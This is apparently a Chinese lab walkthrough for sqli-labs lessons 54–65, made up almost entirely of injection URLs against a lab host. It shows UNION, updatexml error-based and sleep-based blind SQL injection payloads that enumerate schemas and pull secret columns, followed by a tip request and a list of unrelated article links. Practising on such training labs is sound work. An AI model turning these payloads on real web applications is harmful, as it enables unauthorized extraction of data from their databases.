Less-54 union - 1

http://10.10.202.112/sqli/Less-54?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

zgysfs4pe4

http://10.10.202.112/sqli/Less-54?id=-1' union select 1,2,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7a677973667334706534)--+

secret_7MLR

http://10.10.202.112/sqli/Less-54?id=-1' union select 1,2,(SELECT+GROUP_CONCAT(secret_7MLR+SEPARATOR+0x3c62723e)+FROM+zgysfs4pe4)--+

Less-55 union - 2

SELECT * FROM security.users WHERE id=($id) LIMIT 0,1

http://10.10.202.112/sqli/Less-55?id=-1) union select 1,2,(SELECT+GROUP_CONCAT(id,0x7e,secret_L9QL+SEPARATOR+0x3c62723e)+FROM+qqks4m1bux)--+

Less-56 union - 3

SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1

http://10.10.202.112/sqli/Less-56?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

j7gins5xve

http://10.10.202.112/sqli/Less-56/?id=-1') union select 1,2,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6a3767696e7335787665)--+

http://10.10.202.112/sqli/Less-56/?id=-1') union select 1,2,(SELECT+GROUP_CONCAT(secret_IZ5L+SEPARATOR+0x3c62723e)+FROM+j7gins5xve)--+

Less- 57 union - 4

$id= '"'.$id.'"';

$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

http://10.10.202.112/sqli/Less-57?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

suhaxhpjdj

http://10.10.202.112/sqli/Less-57?id=-1" union select 1,2,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x737568617868706a646a)--+

secret_091Y

http://10.10.202.112/sqli/Less-57?id=-1" union select 1,2,(SELECT+GROUP_CONCAT(secret_091Y+SEPARATOR+0x3c62723e)+FROM+suhaxhpjdj)--+

Less-58 报错型盲注 - 1

http://10.10.202.112/sqli/Less-58?id=1'  and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

sa77s59fy3

http://10.10.202.112/sqli/Less-58?id=1'   and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x73613737733539667933 limit 2,1)),null)--+

http://10.10.202.112/sqli/Less-58?id=1'    and updatexml(null,concat(0x0a,(select concat(secret_LNXT) from sa77s59fy3 limit 0,1)),null)--+

Less-59 报错型盲注 - 2

http://10.10.202.112/sqli/Less-59?id=1  and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

6ew31kswfa

http://10.10.202.112/sqli/Less-59?id=1   and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x7a6c713665616533616c limit 2,1)),null)--+

http://10.10.202.112/sqli/Less-59?id=1    and updatexml(null,concat(0x0a,(select concat(secret_PCWB) from zlq6eae3al limit 0,1)),null)--+

Less- 60 报错型盲注 - 3

-1")--+ 进行闭合

http://10.10.202.112/sqli/Less-60?id=-1")     and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

hcgeeqbc27

http://10.10.202.112/sqli/Less-60?id=-1")      and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x68636765657162633237 limit 2,1)),null)--+

secret_6YDQ

http://10.10.202.112/sqli/Less-60?id=-1")    and updatexml(null,concat(0x0a,(select concat(secret_6YDQ) from hcgeeqbc27 limit 0,1)),null)--+ 

Less 61 报错型盲注 - 4

1')) --+ 进行闭合

http://10.10.202.112/sqli/Less-61/index.php?id=1' ))   and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--+

aum8al0pvg

http://10.10.202.112/sqli/Less-61/index.php?id=1' ))    and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x61756d38616c30707667 limit 2,1)),null)--+

secret_8MGI

http://10.10.202.112/sqli/Less-61/index.php?id=1' ))     and updatexml(null,concat(0x0a,(select concat(secret_8MGI) from aum8al0pvg limit 0,1)),null)--+

Less-62 盲注 - 1

http://10.10.202.112/sqli/Less-62?id=1') and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79,0,sleep(5))--+

http://10.10.202.112/sqli/Less-62?id=1') and if(substr(@@version,1,1)>5,0,sleep(5))--+

Less-63 盲注 - 2

1'--+ 进行闭合

http://10.10.202.112/sqli/Less-63?id=1' and if(substr(@@version,1,1)>5,0,sleep(5))--+

Less-64 盲注 - 3

http://10.10.202.112/sqli/Less-64?id=1)) and if(substr(@@version,1,1)>5,0,sleep(5))--+

Less-65 盲注 - 4

http://10.10.202.112/sqli/Less-65?id=1") and if(substr(@@version,1,1)>5,0,sleep(5))--+

完结!!!

点击赞赏二维码,您的支持将鼓励我继续创作!

最新文章

  1. ExtJS基础知识总结:自定义日历和ComboBox控件(二)
  2. Ubuntu下VIM的安装及其配置——Linux篇
  3. MySQL中进行树状所有子节点的查询
  4. Ubuntu上部署C# 网站 步骤简单记录
  5. Object-C日志记录
  6. OpenCV——Delaunay三角 [转载]
  7. 2016 ccpc 杭州赛区的总结
  8. [JZOJ3588]【中山市选2014】J语言(表达式解析+栈)
  9. BZOJ.2823.[AHOI2012]信号塔(最小圆覆盖 随机增量法)
  10. Spark LDA实战
  11. ok6410下的uboot分析与实现
  12. pascalVOC 标注文件,解析为TXT
  13. 在远程登陆的主机上通过命令行源码编译安装 GNU M4、autoconf、automake 等程序
  14. 桥接模式(bridge pattern)-------结构型模式
  15. TreeMap的应用
  16. Typescript中一些不理解的概念解释(泛型、断言、解构、枚举)
  17. 使用 runtime 实现字符串转方法,并传递参数
  18. 理解PV操作和信号量
  19. 关于Web应用程序,下列说法错误的是( )。
  20. Half Lambert

热门文章

  1. Redis实战(一)Redis简介及环境安装(Windows)
  2. Selenium(十七):unittest单元测试框架(三) 脚本分析、编写Web用例
  3. Java学习 1.4——第一个Java程序:Hello World!
  4. golang-基础
  5. Vue的MVVM框架理解
  6. 25个JavaScript数组方法代码示例
  7. 移动网络游戏实现流程——并借此阐明pomelo在GitHub上各个项目间的关系
  8. 【python3基础】python3 神坑笔记
  9. 微信小程序开发——websocket测试
  10. linux编程fcntl获取和设置文件状态